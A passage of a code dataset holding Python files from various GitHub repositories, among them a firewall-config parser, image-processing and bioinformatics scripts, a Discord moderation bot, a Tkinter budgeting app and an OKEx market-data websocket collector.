instance_name and line.rstrip().endswith(\" !!\") and line.startswith(\"!! END\"):\r\n\t\t\tinstance_name = None\r\n\t\telif instance_name:\r\n\t\t\t_instance_list.append(line.rstrip())\r\n\treturn _instances_dict\r\n\r\n# ----------------------------------------------------------------------------------------\r\nclass INSTANCES(Plurals):\r\n\t\"\"\"firewall object with instances\"\"\"\r\n\r\n\tdef __init__(self, config_list):\r\n\t\tself._repr_dic = _get_instances_lists_dict(config_list)\r\n\t\tif not self._repr_dic:\r\n\t\t\tself._repr_dic['system'] = config_list\r\n\t\tself.set_objects()\r\n\r\n\t# ~~~~~~~~~~~~~~~~~~~ EXTERNAL CALLABLES ~~~~~~~~~~~~~~~~~~~\r\n\tdef set_objects(self):\r\n\t\t\"\"\"sets instances details\"\"\"\r\n\t\tfor _name, lines_list in self._repr_dic.items():\r\n\t\t\t_instance = INSTANCE(_name, lines_list)\r\n\t\t\t_instance.parse()\r\n\t\t\tself._repr_dic[_name] = _instance\r\n\r\n# ----------------------------------------------------------------------------------------\r\nclass INSTANCE(Singulars):\r\n\t\"\"\"a single instance object on a firewall config\"\"\"\r\n\r\n\tdef __init__(self, instance_name, instance_config_list):\r\n\t\tsuper().__init__(instance_name)\r\n\t\tself._repr_dic['conf_list'] = instance_config_list\r\n\t\t\r\n\t# ~~~~~~~~~~~~~~~~~~~ EXTERNAL CALLABLES ~~~~~~~~~~~~~~~~~~~\r\n\tdef parse(self):\r\n\t\t\"\"\"parsing through config\"\"\"\r\n\t\tconf_list = self._repr_dic['conf_list']\r\n\t\tself['routes'] = get_object(ROUTES, conf_list=conf_list)\r\n\t\tself['obj_grps'] = get_object(OBJS, conf_list=conf_list)\r\n\t\tself['acls'] = get_object(ACLS, conf_list=conf_list, objs=self['obj_grps'])\r\n\r\n# ----------------------------------------------------------------------------------------\r\n","repo_name":"aliasgar1978/fwOper","sub_path":"fwOper/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34385399236","text":"\"\"\"\n CS20B1097 HIMANSHU\n\n Download the leaning tower of the PISA image and \n find the angle of inclination using appropriate \n rotations with bilinear interpolation.\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ndef image_rotation(image, angle):\n angle = np.radians(angle)\n\n height = image.shape[0]\n width = image.shape[1]\n final_image = np.uint8(np.zeros(image.shape))\n x0, y0 = (width//2), (height//2)\n\n for x in range(height):\n for y in range(width):\n x_new = (x-x0) * np.cos(angle) + (y-y0) * np.sin(angle)\n y_new = -(x-x0) * np.sin(angle) + (y-y0) * np.cos(angle)\n x_new = round(x_new) + x0\n y_new = round(y_new) + y0\n\n if (x_new >= 0 and y_new >= 0 and x_new < image.shape[0] and y_new < image.shape[1]):\n final_image[x, y, :] = image[x_new, y_new, :]\n\n # for x in range(height):\n # for y in range(width):\n # if final_image[x, y, :].all() == 0:\n # if x1 and y>1:\n # for z in range(3):\n # final_image[x, y, z] = (final_image[x+1, y, z] + final_image[x-1, y, z] + final_image[x, y+1, z] + final_image[x, y-1, z])/4\n\n return final_image\n\n\nimage = cv2.imread(\"PISA.jpg\")\ncv2.imshow(\"Original Image\", image)\n\n# angle in degree\nangle = 8\n\n# Image Rotation using user defined function\nrotated_image_userdef = image_rotation(image, angle)\ncv2.imshow(\"Rotated Image using User defined function\", rotated_image_userdef)\n\n# Image Rotation using Built-in function\nmatrix = cv2.getRotationMatrix2D((image.shape[0]/2, image.shape[1]/2), angle, 1)\nrotated_image_buitin = cv2.warpAffine(image, matrix, (image.shape[1], image.shape[0]))\ncv2.imshow(\"Rotated Image using Buit-in function\", rotated_image_buitin)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"malviyaHimanshu/digital-image-processing","sub_path":"Assignment 4/assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72315256101","text":"from django import forms\nfrom appointment_app.models import DoctorAppointment, OnlineDoctorAppointment\n\nclass DoctorAppointmentForm(forms.ModelForm):\n \n class Meta:\n model = DoctorAppointment\n fields=('appointment_time',)\n\n widgets={\n 'appointment_time':forms.TimeInput(attrs={'class':'timepicker','type':'time','format':'%H:%M','placeholder':'HH:MM:AM'}),\n }\n\nclass OnlineDoctorAppointmentForm(forms.ModelForm):\n \n class Meta:\n model = OnlineDoctorAppointment\n fields=('online_appointment_time',)\n\n widgets={\n 'online_appointment_time':forms.TimeInput(attrs={'class':'timepicker','type':'time','format':'%H:%M','placeholder':'HH:MM:AM'}),\n }\n","repo_name":"Smile-94/My-Doctor-Patient-Management-Systm","sub_path":"patientmanagement/appointment_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3357115300","text":"import numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqUtils import GC\nfrom Bio import AlignIO\nfrom Bio import pairwise2\nfrom Bio.Align import MultipleSeqAlignment\nfrom Bio.SeqRecord import SeqRecord\nimport pandas as pd\nimport os,sys\n\n# file with sequences\nsequence_file = sys.argv[1]\nlineage_file = sys.argv[2]\n\ndef getDataLine(seqId, seq):\n dataLine = []\n dataLine.append(seqId)\n\n newSeq = \"\"\n newSeq = newSeq + seq\n\n dataLine.append(newSeq)\n\n return dataLine\n\n\n# altered DNA to protein (DNA to AA)\ndef translate(seq,metadata):\n metadata = pd.read_csv(metadata,encoding='ISO-8859-1')\n seqs = SeqIO.parse(seq, 'fasta')\n dataList = []\n table = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',\n 'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',\n '---': '-',}\n protein =\"\"\n for record in seqs:\n for line in range(len(record)):\n if record.id == metadata['strain'][line]:\n for i in range(0, len(record.seq), 3):\n if str(record.seq.upper())[i:i + 3] in table:\n codon = str(record.seq.upper())[i:i + 3]\n protein+= table[codon]\n else:\n codon = \"X\"\n protein+= codon\n dataList.append(getDataLine(record.id,Seq(protein)))\n break\n return dataList\n\ntran_alignment = translate(sequence_file,lineage_file)\n\n# export transform data\npd.DataFrame(tran_alignment, columns=['id','Seq']).to_csv('{}_trans_alignment.csv'.format(os.path.splitext(sequence_file)[0]), index = False,encoding='utf-8')\n\npath = os.path.splitext(sequence_file)[0]\nprint(f'Transforming finshed! \\n Output saved: {path}_tran_alignment.csv')","repo_name":"cychaoo/HAClade_H3N2","sub_path":"script/dna2aa.py","file_name":"dna2aa.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41092419165","text":"from dash import html, dcc\n\nimport dash_bootstrap_components as dbc\nimport dash_daq as daq\n\nfrom .colores import *\n\nfrom ..data import MUNICIPIOS\n\nFiltros = html.Div(\n [\n html.H4(\"MAPA NORMATIVO\", className=\"text-white pt-3\"),\n html.P([\n \"Seleccioná el municipio de tu interés.\",\n html.Br(),\n \"Activá y desactivá las capas de los diferentes elementos. De momento está disponible Mar Chiquita.\"\n ]),\n dbc.Row([dbc.Col([\n html.Label(htmlFor=\"select-municipio\", title='Municipio'),\n dcc.Dropdown(\n id=\"select-municipio\",\n options=MUNICIPIOS,\n multi=False,\n searchable = False,\n placeholder = 'Selecciona un municipio.',\n value=\"Mar Chiquita\",\n clearable=False,\n ) \n ], md=12), \n \n ]),\n html.Br(),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_cursos\", labelPosition=\"bottom\",color=CURSOS_CUERPOS_AGUA), md=3),\n dbc.Col(html.Span(\"Cursos de agua\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_cuerpos\", labelPosition=\"bottom\",color=CURSOS_CUERPOS_AGUA), md=3),\n dbc.Col(html.Span(\"Cuerpos de agua\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_localidades\", labelPosition=\"bottom\",color=LOCALIDADES), md=3),\n dbc.Col(html.Span(\"Localidades\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_reservas\", labelPosition=\"bottom\",color=RESERVAS), md=3),\n dbc.Col(html.Span(\"Reservas\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_escuelas\", labelPosition=\"bottom\",color=ESCUELAS), md=3),\n dbc.Col(html.Span(\"Escuelas\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_excl\", labelPosition=\"bottom\",color=ZONA_EXCLUSIÓN), md=3),\n dbc.Col(html.Span(\"Zonas de Exclusión\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_amort\", labelPosition=\"bottom\",color=ZONA_AMORTIGUAMIENTO), md=3),\n dbc.Col(html.Span(\"Zonas de Amortiguamiento\"), md=9)\n ], className=\"mb-2\"),\n \n \n ],\n id=\"filtros\",\n className=\"mt-5\"\n)","repo_name":"reflejar/pis-dash","sub_path":"pages/mapa_normativo/componentes/filtros.py","file_name":"filtros.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72350514662","text":"import sys\nimport tkinter as tk\nfrom tkinter import ttk\nfrom datetime import date\nfrom pyrecord import *\nfrom pycategory import *\n\ncategories = Categories()\nrecords = Records()\n\ndef balance(money):\n global bala_str\n records.set_balance(int(money))\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef delete():\n global record_box\n records.delete(record_box.index(record_box.curselection()))\n record_box.delete(record_box.curselection())\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef add(date, category, description, amount):\n category = category.replace(' ', '')\n category = category.replace('-','')\n records.add(date + ' ' + category + ' ' + description + ' ' + amount, categories)\n global record_box\n global bala_str\n record_box.delete(0, tk.END)\n for i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef find(category):\n target_categories = categories.find_subcategories(category, categories._categories)\n L = records.find(target_categories)\n global record_box\n record_box.delete(0, tk.END)\n for i , r in enumerate(L[1]):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n global bala_str\n bala_str.set(\"Total amount above is \" + str(L[0]) + \" dollars.\")\n\ndef reset():\n global record_box\n record_box.delete(0, tk.END)\n for i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n global bala_str\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n \n\nroot = tk.Tk()\nf = tk.Frame(root)\nf.grid(row = 0, column = 0)\nroot.title('PyMoney')\n\nfind_label = tk.Label(f, text = 'Find category')\nfind_label.grid(row = 0, column = 0)\nfind_str = tk.StringVar()\nfind_entry = tk.Entry(f, textvariable = find_str)\nfind_entry.grid(row = 0, column = 1)\nfind_btn = tk.Button(f, text = 'Find', command = lambda: find(find_str.get()))\nfind_btn.grid(row = 0, column = 2)\nrst_btn = tk.Button(f, text = 'Reset', command = lambda: reset())\nrst_btn.grid(row = 0, column = 3)\n\ninit_label = tk.Label(f, text = 'Initial money')\ninit_label.grid(row = 1, column = 4)\ninit_str = tk.StringVar()\ninit_entry = tk.Entry(f, textvariable = init_str)\ninit_entry.grid(row = 1, column = 5)\ninit_entry.insert(0, 0)\nupda_btn = tk.Button(f, text = 'Update', command = lambda: balance(init_str.get()))\nupda_btn.grid(row = 2, column = 5, sticky='E')\n\nspac_label = tk.Label(f, text = '')\nspac_label.grid(row = 3, column = 4)\n\ndate_label = tk.Label(f, text = 'Date')\ndate_label.grid(row = 4, column = 4)\ndate_str = tk.StringVar()\ndate_entry = tk.Entry(f, textvariable = date_str)\ndate_entry.grid(row = 4, column = 5)\ndate_entry.insert(0, str(date.today()))\n\ncate_label = tk.Label(f, text = 'Category')\ncate_label.grid(row = 5, column = 4)\ncate_str = tk.StringVar()\ncate_combo = ttk.Combobox(f, values = ['- expense',\n ' - food',\n ' - meal',\n ' - snack', \n ' - drink',\n ' - transportation', \n ' - bus', \n ' - railway',\n '- income', \n ' - salary', \n ' - bonus'], width = 18)\ncate_combo.grid(row = 5, column = 5)\n\ndesc_label = tk.Label(f, text = 'Description')\ndesc_label.grid(row = 6, column = 4)\ndesc_str = tk.StringVar()\ndesc_entry = tk.Entry(f, textvariable = desc_str)\ndesc_entry.grid(row = 6, column = 5)\n\namou_label = tk.Label(f, text = 'Amount')\namou_label.grid(row = 7, column = 4)\namou_str = tk.StringVar()\namou_entry = tk.Entry(f, textvariable = amou_str)\namou_entry.grid(row = 7, column = 5)\nadd_btn = tk.Button(f, text = 'Add a record', command = lambda: add(date_str.get(), cate_combo.get(), desc_str.get(), amou_str.get()))\nadd_btn.grid(row = 8, column = 5, sticky='E')\n\nrecord_box = tk.Listbox(f, width = 47)\nrecord_box.grid(row = 1, column = 0, rowspan = 8, columnspan = 4)\nfor i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n\nbala_str = tk.StringVar()\nbala_str.set('Now you have ' + str(records.balance) + ' dollars.')\nbala_label = tk.Label(f, textvariable = bala_str)\nbala_label.grid(row = 9, column = 0, columnspan = 3, sticky='W')\ndele_btn = tk.Button(f, text = 'Delete', command = lambda: delete())\ndele_btn.grid(row = 9, column = 3)\n\nf.mainloop()\n\nrecords.save()\n \n'''while True:\n command = input('\\nWhat do you want to do (add / view / delete / view categories / find / exit)? ')\n if command == 'add':\n record = input('Add an expense or income record with category, description, and amount (separate by spaces):\\n')\n records.add(record, categories)\n elif command == 'view':\n records.view()\n elif command == 'delete':\n delete_record = input(\"Which record do you want to delete? \")\n records.delete(delete_record)\n elif command == 'view categories':\n categories.view(categories._categories, 0)\n elif command == 'find':\n category = input('Which category do you want to find? ')\n target_categories = categories.find_subcategories(category, categories._categories)\n records.find(target_categories, category)\n elif command == 'exit':\n records.save()\n break\n else:\n sys.stderr.write('Invalid command. Try again.\\n')'''\n\n\n","repo_name":"haiyin0922/programming-in-python","sub_path":"project/pymoney.py","file_name":"pymoney.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40092304059","text":"import argparse\nimport cv2\nimport os\nimport warnings\nimport glob\n\nfrom basicsr.metrics import calculate_niqe\n\nlog_save_path = 'results/table_logs_all/'\n\ndata_root = 'results/Compare'\nref_root = 'datasets/'\nref_dirs = ['DIV2K/DIV2K_valid_HR/']\ndatasets = ['DIV2K100']\nmethods = ['LDL']\n\nlogoverall_path = log_save_path + 'all_avgs/NIQE_all_avgs.txt'\n\nfor index in range(len(ref_dirs)):\n ref_dir = os.path.join(ref_root, ref_dirs[index])\n for method in methods:\n img_dir = os.path.join(data_root, method, datasets[index])\n print(img_dir)\n\n img_list = sorted(glob.glob(os.path.join(img_dir, '*')))\n\n os.makedirs(log_save_path, exist_ok=True)\n log_path = log_save_path + 'NIQE__' + method + '__' + datasets[index] + '.txt'\n\n if not os.path.exists(log_path):\n\n crop_border = 4\n\n niqe_all = []\n\n for i, img_path in enumerate(img_list):\n file_name = img_path.split('/')[-1]\n basename, ext = os.path.splitext(os.path.basename(img_path))\n img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore', category=RuntimeWarning)\n niqe_score = calculate_niqe(img, crop_border, input_order='HWC', convert_to='y')\n niqe_all.append(niqe_score.item())\n log = f'{i + 1:3d}: {file_name:25}. \\tNIQE: {niqe_score.item():.6f}.'\n with open(log_path, 'a') as f:\n f.write(log + '\\n')\n\n log = f'Average: NIQE_all: {sum(niqe_all) / len(niqe_all):.6f}'\n with open(log_path, 'a') as f:\n f.write(log + '\\n')\n log_overall = method + '__' + datasets[index] + '__' + log\n with open(logoverall_path, 'a') as f:\n f.write(log_overall + '\\n')\n print(log_overall)","repo_name":"csjliang/LDL","sub_path":"scripts/metrics/table_calculate_niqe_all.py","file_name":"table_calculate_niqe_all.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"35"} +{"seq_id":"12435924480","text":"import discord\nfrom discord import app_commands\nimport logging\nimport traceback\n\nfrom typing import Optional\n\nfrom .. import vesta_client, session_maker, lang\nfrom ..modals import PresentationForm\nfrom ..tables import Presentation, select, or_, Guild, Ban\n\nlogger = logging.getLogger(__name__)\nsession = session_maker()\n\n\n@app_commands.guild_only()\n@vesta_client.tree.command(description=\"Submit a presentation\")\nasync def presentation(interaction: discord.Interaction):\n logger.debug(f\"Command /presentation used\")\n\n r = select(Guild).where(Guild.id == interaction.guild_id)\n guild = session.scalar(r)\n if not guild or not guild.review_channel or not guild.projects_channel:\n return await interaction.response.send_message(\n lang.get(\"presentations_not_available\", interaction.guild), ephemeral=True)\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if response and response.presentation_banned:\n return await interaction.response.send_message(\n lang.get(\"presentations_banned\", interaction.guild),\n ephemeral=True)\n await interaction.response.send_modal(PresentationForm(interaction))\n\n\n@app_commands.guild_only()\n@app_commands.default_permissions(ban_members=True)\nclass PresentationManage(app_commands.Group, name=\"presentationmanage\", description=\"Presentation manager\"):\n\n async def on_error(self, interaction: discord.Interaction, error):\n logger.debug(f\"Error {error} raised\")\n if isinstance(error, app_commands.errors.MissingPermissions):\n await interaction.response.send_message(\n lang.get(\"permissions_error\", interaction.guild), ephemeral=True)\n elif isinstance(error, app_commands.errors.BotMissingPermissions):\n await interaction.response.send_message(\n lang.get(\"bot_permissions_error\", interaction.guild) + f\" {', '.join(error.missing_permissions)}\",\n ephemeral=True)\n else:\n logger.error(traceback.format_exc())\n await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n\npresentation_manage = PresentationManage()\n\n\n@presentation_manage.command(description=\"Show a presentation\")\n@app_commands.describe(research=\"Presentation's Id or Author's Id\")\nasync def show(interaction: discord.Interaction, research: Optional[str] = None, user: Optional[discord.Member] = None):\n logger.debug(f\"Command /presentationmanage show [research={research},user={user}] used\")\n if not (research or user):\n return await interaction.response.send_message(\n lang.get(\"minimum_one_parameter\", interaction.guild), ephemeral=True)\n if user:\n r = select(Presentation).where(Presentation.author_id == user.id)\n else:\n if not research.isdecimal() or int(research) > 2 ** 63 - 1:\n return await interaction.response.send_message(\n content=lang.get(\"invalid_number\", interaction.guild),\n ephemeral=True)\n r = select(Presentation).where(or_(Presentation.id == research, Presentation.author_id == research))\n presentations = session.scalars(r).all()\n if not len(presentations):\n return await interaction.response.send_message(\n content=lang.get(\"no_result\", interaction.guild),\n ephemeral=True,\n )\n if len(presentations) == 1:\n presentation = presentations[0]\n embed = presentation.embed('222222')\n return await interaction.response.send_message(embed=embed)\n embed = discord.Embed(\n colour=int('222222', 16),\n title=lang.get(\"user_result_title\", interaction.guild)\n )\n for presentation in presentations:\n emoji = '🕑'\n if presentation.reviewed:\n emoji = ['❌', '✅'][presentation.accepted]\n embed.add_field(name=f\"{presentation.id} : {emoji}\", value=presentation.title)\n return await interaction.response.send_message(embed=embed)\n\n\n@presentation_manage.command(description=\"Ban a user from submitting a presentation\")\n@app_commands.describe(user=\"The user to ban\")\nasync def ban(interaction: discord.Interaction, user: discord.Member):\n logger.debug(f\"Command /presentationmanage ban {user} used\")\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if not response:\n response = Ban(\n user_id=user.id,\n guild_id=interaction.guild.id\n )\n session.add(response)\n response.presentation_banned = True\n\n try:\n session.commit()\n except:\n session.rollback()\n\n logger.error(traceback.format_exc())\n return await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"user_result_title\", interaction.guild))\n\n\n@presentation_manage.command(description=\"Unban a user from submitting a presentation\")\n@app_commands.describe(user=\"The user to unban\")\nasync def unban(interaction: discord.Interaction, user: discord.Member):\n logger.debug(f\"Command /presentationmanage unban {user} used\")\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if not (response and response.presentation_banned):\n return await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"presentations_not_banned\", interaction.guild))\n response.presentation_banned = False\n\n try:\n session.commit()\n except:\n session.rollback()\n\n logger.error(traceback.format_exc())\n return await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"presentations_unban\", interaction.guild))\n\n\n@presentation_manage.command(name=\"list\", description=\"Show the banlist\")\n@app_commands.describe(page=\"The page\")\nasync def banlist(interaction: discord.Interaction, page: Optional[int] = 0):\n logger.debug(f\"Command /presentationmanage list used\")\n\n r = select(Ban).where(Ban.guild_id == interaction.guild.id)\n r = r.where(Ban.presentation_banned == True).offset(50 * page).limit(50)\n results = session.scalars(r)\n\n ban_list = \"\"\n for result in results:\n ban_list += f\"<@{result.user_id}>\\n\"\n\n banned_embed = discord.Embed(title=lang.get(\"presentations_list_title\", interaction.guild), description=ban_list)\n banned_embed.set_footer(text=lang.get(\"list_page\", interaction.guild) + f\" {page}\")\n\n await interaction.response.send_message(embed=banned_embed,\n allowed_mentions=discord.AllowedMentions().none())\n\n\nvesta_client.tree.add_command(presentation_manage)\n","repo_name":"adraug/Vesta","sub_path":"vesta/commands/presentation.py","file_name":"presentation.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"30771281503","text":"import numpy as np\nfrom sklearn import metrics\n\n\ndef cal_cm(y_true,y_pred):\n \"\"\"\n 计算混淆矩阵\n \"\"\"\n y_true=y_true.reshape(1,-1).squeeze()\n y_pred=y_pred.reshape(1,-1).squeeze()\n cm=metrics.confusion_matrix(y_true,y_pred)\n return cm\n\n\ndef intersection_over_union(confusion_matrix):\n \"\"\"\n 计算IoU。输入是一个混淆矩阵。\n \"\"\"\n intersection = np.diag(confusion_matrix)#交集\n union = np.sum(confusion_matrix, axis=1) + np.sum(confusion_matrix, axis=0) - np.diag(confusion_matrix)#并集\n IoU = intersection / union #交并比,即IoU\n return IoU\n\n# 一个案例\ny_pred = np.random.randint(0, 3, (32,64)).reshape(1,-1).squeeze()\ny_true = np.random.randint(0, 3, (32,64)).reshape(1,-1).squeeze()\ncm = cal_cm(y_true, y_pred)\niou = intersection_over_union(cm)\nprint(iou)\n","repo_name":"BioAI-kits/utils","sub_path":"cal_iou.py","file_name":"cal_iou.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28873150251","text":"from openerp import models, fields\n\n\nclass ResUsers(models.Model):\n _inherit = 'res.users'\n\n warehouse_ids = fields.Many2many(\n string='Warehouses',\n comodel_name='stock.warehouse',\n relation='user_warehouse_rel',\n column1='user_id',\n column2='warehouse_id',\n help='Warehouses allowed for this user.',\n )\n location_ids = fields.Many2many(\n string='Locations',\n comodel_name='stock.location',\n relation='user_location_rel',\n column1='user_id',\n column2='location_id',\n help='Locations allowed for this user.',\n )\n","repo_name":"pranav-1into2/Minsk","sub_path":"trey-addons/security_stock/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"12299363542","text":"# coding=utf-8\n\nimport json\nimport redis\nimport websocket\n\nfrom dao_quote.util.convert import convert\nfrom dao_quote.settings import config_collect\n\n\ndef okex_on_message(ws, message):\n data = json.loads(message)\n table = data['arg']['channel']\n symbol = data['arg']['instId'].lower().replace('-', '_')\n if (table == 'trades'):\n type = 'trade'\n trade_list = data['data']\n for data in trade_list:\n trade_dict = {}\n trade_dict['ts'] = int(data['ts'])\n trade_dict['trade_id'] = data['tradeId']\n trade_dict['price'] = data['px']\n trade_dict['size'] = data['sz']\n trade_dict['side'] = data['side']\n send_event_dict(symbol, type, trade_dict)\n elif (table == 'tickers'):\n data = data['data'][0]\n type = 'ticker'\n tick_dict = {}\n tick_dict['ts'] = int(data['ts'])\n tick_dict['ask'] = float(data['askPx'])\n tick_dict['a_v'] = float(data['askSz'])\n tick_dict['bid'] = float(data['bidPx'])\n tick_dict['b_v'] = float(data['bidSz'])\n tick_dict['last'] = float(data['last'])\n tick_dict['open'] = float(data['open24h'])\n tick_dict['high'] = float(data['high24h'])\n tick_dict['low'] = float(data['low24h'])\n tick_dict['vol'] = float(data['vol24h'])\n tick_dict['amt'] = float(data['volCcy24h'])\n send_event_dict(symbol, type, tick_dict)\n elif (table == 'books5'):\n type = 'depth'\n data = data['data'][0]\n data['asks'].reverse()\n data['ts'] = int(data['ts'])\n send_event_dict(symbol, type, data)\n elif (table == 'books-l2-tbt'):\n type = 'depthall'\n instId = data['arg']['instId']\n data = data['data'][0]\n data['asks'].reverse()\n data['ts'] = int(data['ts'])\n send_event_dict(symbol, type, data)\n elif (table == 'candle1m'):\n type = 'kline'\n data = data['data']\n send_event_dict(symbol, type, data)\n\n\ndef send_event_dict(symbol, type, data):\n global exchange\n global pool\n\n key_name = '{}_{}_{}'.format(exchange, symbol, type)\n\n r = redis.StrictRedis(connection_pool=pool)\n event_type = type\n event_dict = {}\n event_dict['event_type'] = event_type\n event_dict['key_name'] = key_name\n event_dict['exchange'] = exchange\n event_dict['symbol'] = symbol\n event_dict['data'] = json.dumps(data)\n event_dict = json.dumps(event_dict)\n r.publish(key_name, event_dict)\n r.publish(config_collect.CHANNEL, event_dict)\n r[key_name] = str(data)\n r.lpush(config_collect.LPUSH_RECORD_MQ, event_dict)\n\n\ndef okex_on_error(ws, error):\n print('error: {}'.format(error))\n\n\ndef okex_on_close(ws):\n print(\"Connection okex closed ……\")\n\n\ndef okex_on_open(ws):\n global symbol_list\n global type_list\n for symbol in symbol_list:\n symbol = symbol.upper().replace('_', '-')\n channel_list = []\n for type in type_list:\n channel_dict = {}\n if (type == 'ticker'):\n channel_dict['channel'] = 'tickers'\n channel_dict['instId'] = symbol\n elif (type == 'depth'):\n channel_dict['channel'] = 'books5'\n channel_dict['instId'] = symbol\n elif (type == 'depthall'):\n channel_dict['channel'] = 'books-l2-tbt'\n channel_dict['instId'] = symbol\n elif (type == 'trade'):\n channel_dict['channel'] = 'trades'\n channel_dict['instId'] = symbol\n elif (type == 'kline'):\n channel_dict['channel'] = 'candle1m'\n channel_dict['instId'] = symbol\n channel_list.append(channel_dict)\n sub_param = {\"op\": \"subscribe\", \"args\": channel_list}\n req = json.dumps(sub_param)\n ws.send(req)\n\n\ndef main(symbol_list_, type_list_):\n global exchange\n global symbol_list\n global type_list\n global pool\n exchange = 'okex'\n symbol_list = symbol_list_\n type_list = type_list_\n pool = redis.ConnectionPool(host=config_collect.REDIS_HOST, port=config_collect.REDIS_PORT, db=0)\n url = 'wss://ws.okex.com:8443/ws/v5/public'\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(url,\n on_message=okex_on_message,\n on_error=okex_on_error,\n on_close=okex_on_close)\n ws.on_open = okex_on_open\n ws.run_forever(ping_timeout=3)\n","repo_name":"Maxwellpower1/fsb","sub_path":"dao_quote/dao_quote/util/exchange_api/okex/wss_okex_v5.py","file_name":"wss_okex_v5.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19001232399","text":"#!/usr/bin/env python\n\nif __name__ == '__main__':\n import argparse\n import sys\n import tensorflow as tf\n from model import Model\n\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('mode', type=str, help='operating mode (train or generate)')\n parser.add_argument('--model', type=str, default='./saved_model/model.ckpt')\n parser.add_argument('--input', type=str, nargs='+', 